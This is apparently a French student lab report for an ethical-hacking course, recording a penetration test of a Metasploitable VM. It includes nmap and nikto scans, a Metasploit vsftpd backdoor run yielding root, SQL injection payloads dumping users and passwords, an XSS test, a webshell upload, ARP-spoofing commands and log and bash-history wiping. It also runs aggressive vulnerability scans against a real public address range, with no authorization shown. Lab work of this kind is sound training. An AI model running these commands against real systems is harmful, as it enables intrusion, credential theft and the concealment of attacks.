TP_CEH

1- Phase de reconnaissance
 Utilisation de Shodan pour l’identification des services exposés
Commande utilisée : Nous avons effectué la recherche directement sur le site de
Shodan avec la première adresse de la plage donnée.
Les services exposés sont ceux des ports : 22 (SSH), 53 (DNS), 80 (HTTP).

 Résultat du scan avec Advanced IP Scanner

  Point des vulnérabilités
2013(4)

CVE-2013-4365

7.5 Un dépassement de tampon basé sur le tas dans la fonction fcgid_bucket.c ;

CVE-2013-2765

5.0 Version ancienne de ModSecurity (antérieure à 2.7.4) vulnérable au déni de service

CVE-2013-0942

4.3 Une vulnérabilité de cross-site scripting (XSS) dans l'agent d'authentification EMC RSA
7.1.

CVE-2013-0941

2.1 Utilisation d’un algorithme de chiffrement inapproprié et d’une clé faible par l'API
d'authentification EMC RSA (versions antérieures à 8.1 SP1), l'Agent Web RSA (versions
antérieures à 5.3.5 pour le serveur Web Apache), l'Agent Web RSA (versions antérieures à
5.3.5 pour IIS), l'Agent PAM RSA (versions antérieures à 7.0), et l'Agent RSA (versions
antérieures à 6.1.4 pour Microsoft Windows).

2012(3)

CVE-2012-4360

4.3 Une vulnérabilité de cross-site scripting (XSS) dans le module mod_pagespeed (versions
0.10.19.1 à 0.10.22.4 incluses) pour le serveur HTTP Apache.

CVE-2012-4001

5.0 Vérification insuffisante du nom d’hôte par le module mod_pagespeed (versions

antérieures à 0.10.22.6) pour le serveur HTTP Apache.

CVE-2012-3526

5.0 Utilisation de multiples en-têtes X-Forwarded-For dans une requête par le module
reverse proxy add forward (mod_rpaf) (versions 0.5 et 0.6) pour le serveur HTTP Apache.

2011(2)

CVE-2011-2688

7.5 Une vulnérabilité d'injection SQL dans le script mysql/mysql-auth.pl du module

mod_authnz_external (versions 3.2.5 et antérieures) pour le serveur HTTP Apache.

CVE-2011-1176

4.3 Mauvaise gestion de certaines sections de configuration par le mécanisme de fusion de

configuration (configuration merger) dans le fichier itk.c du module mpm-itk Multi-
Processing Module de Steinar H. Gunderson (versions 2.2.11-01 et 2.2.11-02) pour le
serveur HTTP Apache.

2009(2)

CVE-2009-2299

5.0 Vulnérabilité causée par le module Artofdefence Hyperguard Web Application Firewall
(WAF) (versions antérieures à 2.5.5-11635, 3.0 antérieures à 3.0.3-11636, et 3.1 antérieures
à 3.1.1-11637).

CVE-2009-0796

2.6 Une vulnérabilité de cross-site scripting (XSS) dans le fichier Status.pm des modules
Apache::Status et Apache2::Status pour mod_perl1 et mod_perl2.

2007(1)

CVE-2007-4723
7.5 Une vulnérabilité de parcours de répertoire (directory traversal) dans le Ragnarok Online
Control Panel version 4.3.4a.

 Exploits possibles à exploiter

- Dépassement de tampon dans une fonction de lecture d'en-têtes, qui peut
potentiellement mener à l'exécution de code arbitraire à distance (RCE) sur le
serveur. Un attaquant pourrait ainsi prendre le contrôle total du serveur Apache,
installer des malwares, voler des données, ou l'utiliser comme point de départ pour
d'autres attaques sur le réseau interne.
- Déni de service (DoS) dans ModSecurity (WAF) pour Apache, où un attaquant
pourrait rendre le site web inutilisable aux utilisateurs légitimes en provoquant le
plantage répété du serveur Apache ou en saturant son espace disque. C'est une
attaque qui vise la disponibilité du service.
- Cross-site scripting (XSS) dans EMC RSA Authentication Agent (pour IIS et Apache),
où un attaquant peut injecter du code JavaScript malveillant dans les pages web.
Lorsque d'autres utilisateurs visitent ces pages, le code s'exécute dans leur
navigateur. Cela peut permettre le vol de session (cookies), le détournement de
compte, le phishing, la défiguration du site côté client, ou d'autres attaques ciblant
les utilisateurs.
- Chiffrement faible/Clé faible dans divers Agents et API d'authentification EMC RSA,
une vulnérabilité permettant à des utilisateurs locaux (c'est-à-dire ceux ayant déjà
un accès à la machine) d'obtenir des informations sensibles (le "node secret") via des
attaques cryptographiques. Si le secret est compromis, cela peut affaiblir la sécurité
de l'authentification SecurID, potentiellement permettant le contournement
d'authentification ou l'usurpation d'identité au sein du réseau, une fois que
l'attaquant a déjà un pied dans le système.
- Cross-site scripting (XSS) dans mod_pagespeed (Apache), similaire au XSS de l'agent
RSA, un attaquant peut injecter du code malveillant dans les pages servies ou
optimisées par mod_pagespeed, ciblant ainsi les utilisateurs finaux.
- Redirection de requêtes HTTP (SSRF) dans mod_pagespeed (Apache), une
vulnérabilité de Server-Side Request Forgery (SSRF), où l'attaquant peut utiliser
votre serveur Apache comme un proxy pour scanner ou attaquer des systèmes
internes de votre réseau qui ne sont normalement pas exposés à Internet. Il pourrait
découvrir des services vulnérables, accéder à des bases de données internes, ou
exploiter d'autres failles derrière votre pare-feu.
- Déni de service (DoS) dans mod_rpaf (Apache), un attaquant peut rendre le serveur
Apache ou l’application indisponible en lui envoyant des requêtes malveillantes avec
des en-têtes X-Forwarded-For dupliqués.
- Injection SQL dans mysql/mysql-auth.pl (mod_authnz_external pour Apache),
vulnérabilité critique avec laquelle un attaquant peut exécuter des commandes SQL
arbitraires sur votre base de données. Cela peut mener à :
  Vol de données (informations d'identification, données clients).
 Modification ou suppression de données.
 Prise de contrôle complète de la base de données.
 Dans certains cas, exécution de code sur le serveur lui-même (si la
base de données le permet, comme MySQL avec certaines fonctions).
- Élévation de privilèges dans mpm-itk (Apache), une vulnérabilité très grave
d'élévation de privilèges. Un attaquant qui parvient à l'exploiter pourrait exécuter
du code arbitraire avec les droits root sur votre serveur Apache. Cela signifie un
contrôle total du système, la possibilité d'installer des rootkits, de voler toutes les
données, de compromettre le système de manière persistante, etc.
- Déni de service (DoS) par consommation mémoire dans le WAF Artofdefence
Hyperguard (pour Apache), un attaquant peut saturer la mémoire de votre serveur
web, le rendant lent, instable ou le faisant planter, entraînant un déni de service.
 Requête whois et nslookup sur le domaine cible
Commande utilisée : whois metasploit.local

Commande utilisée : nslookup metasploit.local

Nous remarquons que les deux commandes n’aboutissent pas car la machine metasploit est
en local et pas accessible sur Internet.

Mais si nous tentons de faire ces mêmes commandes sur une des adresses de la plage
donnée : 196.192.16.1-196.192.16.126, nous obtenons des résultats : prenons la première
adresse pour faire les analyses :

Commande utilisée : nslookup 196.192.16.1

Commande utilisée : whois uac.bj

 Commande dig
 Fonctionnement

La commande dig (Domain Information Groper) permet d'interroger les serveurs DNS
(Domain Name System) pour obtenir des informations sur les noms de domaine, les
adresses IP, les serveurs de messagerie, etc... Elle fonctionne comme suit :

 Envoi de la requête : dig envoie une requête DNS à un serveur DNS spécifique.
 Parcours du DNS : Si le serveur DNS interrogé ne connaît pas directement la
réponse, il va interroger d'autres serveurs DNS de manière récursive (par
exemple, les serveurs racines, puis les serveurs TLD - Top-Level Domain, puis les
serveurs autoritaires du domaine) jusqu'à trouver l'information.
 Réception et Affichage : Une fois la réponse obtenue, dig vous l'affiche de
manière détaillée, incluant non seulement le résultat final, mais souvent aussi
 des informations sur le processus de requête, le serveur ayant répondu, le temps
de réponse, etc.
 Utilisation de la commande dig
Commande lancée : dig domain metasploit.local

 Capture du traffic de la machine Metasploit avec Wireshark de la

machine Kali
Pour effectuer cette action les deux machines virtuelles sont en mode accès par pont.
Testons d’abord la connectivité entre les machines :
La connectivité étant confirmé, nous pouvons passer à la capture :

Metasploitable_scan.cap
Résultat de la commande shodan –host “IP”

Cette commande n’a pas abouti car l’option -host de shodan nécessite un abonnement.

2- Scan réseau et cartographie

Commande : nmap -sS -sV -A -T4 -p- --script vuln “IP_metasploit.local”
Description de la commande :
-sS : Scan SYN
-sV : Permet de sonder les ports ouverts pour déterminer les informations de version pour
les services des ports ouverts.
-A : Active la détection des systèmes d’exploitation, détection de la version, le scan des
scripts et de tracer la route.
-T4 : Ajuste la vitesse de et l’agressivité du scan
-p- : Scan sur tous les ports
--script : Permet d’exécuter des scripts du moteur NSE (Nmap Scripting Engine)
Repérons les versions vulnérables :
VsFTPd version 2.3.4, OpenSSH 4.7p1, SSL Protocole 3.0 in OpenSSL 1.0.11, Apache:
http.server: 2.2.8, MySQL 5.0.51a-3ubuntu5, PostgreSQL:8.3,

Scannage des plages 196.192.16.1-126

Dans le fichier scan.txt, nous avons enregistré la sortie de la commande : nmap –sS –sV –A –
T4 –p- --script vuln 196.192.16.1-126

3. Énumération et recherche de vulnérabilités

- Utiliser Nikto ou Dirb sur HTTP

nikto -h http://metasploitable.local
Informations générales

 Serveur Web : Apache/2.2.8 (Ubuntu)

 PHP : 5.2.4-2ubuntu5.10
 Port : 80 (HTTP)

Vulnérabilités importantes détectées

/phpinfo.php : donne des infos détaillées sur la config PHP (CWE-552)

Query strings spécifiques (?=PHPE...) : exposent des infos sensibles sur PHP (OSVDB-12184)

/#wp-config.php# : présence d’un fichier qui peut contenir des identifiants de base de
données

X-Frame-Options absent : vulnérable au clickjacking

X-Content-Type-Options non défini : peut permettre une détournement du type MIME

Méthode HTTP TRACE activée : vulnérabilité à XST (Cross Site Tracing)
Réponses valides avec méthodes HTTP non standards : comportement anormal, possible
faille

Apache 2.2.8 est obsolète (dernier de cette branche : 2.2.34, EOL atteint)

PHP 5.2.4 est également obsolète : nombreuses failles connues

mod_negotiation activé avec MultiViews :

facilite les attaques de type brute-force sur les noms de fichiers

Header inhabituel ‘TCN: list’ sur /index

comportement atypique qui peut trahir une mauvaise configuration ou faille

- Enumération SMB avec enum4linux

enum4linux -a metasploitable.local
Système cible

Nom d’hôte : metasploitable.local

Adresse IP : 172.16.2.41

Nom du groupe de travail (Workgroup) : WORKGROUP

Samba version : 3.0.20-Debian :Obsolète avec plusieurs failles connues

SID trouvé : S-1-5-21-1042354039-2475377354-766472396

Comptes utilisateurs récupérés

Enum4linux a listé plus de 30 comptes utilisateurs via différentes techniques (NULL session,
RID cycling) :

Exemples :root, daemon, bin, mysql, postgres, www-data, ftp, tomcat55, msfadmin, user,
games, nobody, etc.

Utilisateur intéressant : msfadmin, souvent utilisé avec mot de passe msfadmin

Partages SMB (Samba)

Nom du partage État

tmp Accessible

opt Accès refusé

print$ Accès refusé

IPC$, ADMIN$ Non listés

- Recherche d’exploits via Searchsploit et Exploit-DB

D’aprés la capture d’écran de nmap -A -Pn metasploitable.local

La version de vsftpd est 2.3.4

searchsploit vsftpd 2.3.4

Deux exploits pour cette version vulnérable du serveur FTP vsftpd 2.3.4, qui est très connue
pour contenir une porte dérobée (backdoor) intégrée volontairement.

Résultats importants

Exploit Title Type

vsftpd 2.3.4 - Backdoor Command Execution Python

vsftpd 2.3.4 - Backdoor Command Execution Metasploit

4. Exploitation

- Exploiter un service vulnérable avec Metasploit:

msfconsole

search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS metasploitable.local

set RPORT 21

run
Exploiter la faille backdoor présente dans le service vsFTPd 2.3.4 pour obtenir un accès shell
root sur la machine cible.

Informations générales

Service ciblé : vsFTPd (Very Secure FTP Daemon) version 2.3.4

Adresse de la cible : metasploitable.local (IP : 172.16.2.41)

Port FTP : 21

Exploit utilisé : exploit/unix/ftp/vsftpd_234_backdoor

Vulnérabilité exploitée

Nom : VSFTPD v2.3.4 Backdoor Command Execution

CVE : CVE-2011-2523

Description : cette version contient un code malveillant caché dans le binaire, activé
lorsqu’un nom d’utilisateur contenant :) est soumis. Il ouvre un shell sur un port aléatoire.
Niveau de gravité : Critique

Résultat de l'exploitation

Exploit réussi

Session shell ouverte avec les privilèges root :

[+] UID: uid=0(root) gid=0(root)

Accès direct au système de fichiers :

ls

bin boot dev etc home lib root sbin tmp usr var ...

-Sur cette machine (dans le DVWA)essayer une attaque par injection sql. Trouver les
comandes pour

• Afficher la liste des utilsateurs de la base de données,

1' UNION SELECT null, user FROM mysql.user --

 • Afficher la liste de la base de données et des tables,

1' UNION SELECT null, schema_name FROM information_schema.schemata --

• Afficher les mots de passe associés aux utilisateurs

1' UNION SELECT user, password FROM users --

- Sur cette machine (dans le DVWA)essayer une attaque par xss reflected et xss stored.
Utiliser les script (<script> alert “bonjour” </script> comme test

xss reflected

<script>alert("bonjour")</script>
xss stored

<script>alert("bonjour")</script>
- Télécharger un webshell.php puis l’envoyer sur la machine à travers le formulaire
d’upload de fichier et tenter de l’exécuter
Téléchargement et modification du fichier php :webshell.php

Formulaire d’upload de fichier et tentative d’exécuter

-Tentez une attaque MiTM entre kali et la machine metasploitable.local
Retrouver la passerelle et mise en place de IP forwarding sur Kali
ip route
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Terminal 1 : Attaque vers la victime

sudo arpspoof -i eth0 -t 172.16.2.41 172.16.2.1
Cela fait croire à Metasploitable que Kali est la passerelle
arp reply 172.16.1.251 is-at 08:00:27:ad:25:87
Cela signifie que ta machine Kali (MAC 08:00:27:ad:25:87) répond à la victime
(Metasploitable) en disant :“Moi, je suis l’adresse IP 172.16.1.251 (la
passerelle)”

Terminal 2 : Attaque vers la passerelle

sudo arpspoof -i eth0 -t 172.16.2.1 172.16.2.41
Cela fait croire à la passerelle que Kali est Metasploitable

arp reply 172.16.2.41 is-at 08:00:27:ad:25:87

Cela signifie que ta machine Kali (MAC 08:00:27:ad:25:87) annonce à la
passerelle (172.16.1.251) :"Moi (Kali), je suis 172.16.2.41 (la victime
Metasploitable)."

Lancer Wireshark sur Kali

sudo wireshark

Choisis eth0 comme interface

Génère du trafic
curl http://metasploitable.local/
ftp metasploitable.local

Dans le filtre Wireshark, taper : http or ftp or dns or arp

On observe du trafic ARP et FTP
 Phase 5 : Maintien de l'accès

Pour garantir un accès à la machine après exploitation, nous allons créer un nouvel
utilisateur avec des droits administrateur (sudo). Cela permettra de se reconnecter en toute
discrétion via SSH.

Ensuite, nous avons essayé de nous connecter avec le nouvel utilisateur créé.
Phase 6 : Effacement des traces

L’objectif est de supprimer toutes les traces de notre passage dans la machine
metasploitable.local.

● Les fichiers de logs enregistrent tout ce qui se passe sur la machine (les connexions,
les erreurs)

Ces commandes suppriment les principaux fichiers de log dans /var/log, y compris
ceux qui enregistrent l’activité des utilisateurs

● Lors de la création de l’utilisateur CEHadmin1 à la phase 5, l’historique des

commandes a conservé toutes les actions effectuées

➢ history -c efface l’historique en mémoire

➢ cat /dev/null > ~/.bash_history vide complètement le fichier d’historique de
l’utilisateur
➢ rm -rf /root/.bash_history supprime l’historique du compte root, au cas où
certaines actions auraient été faites en tant qu’administrateur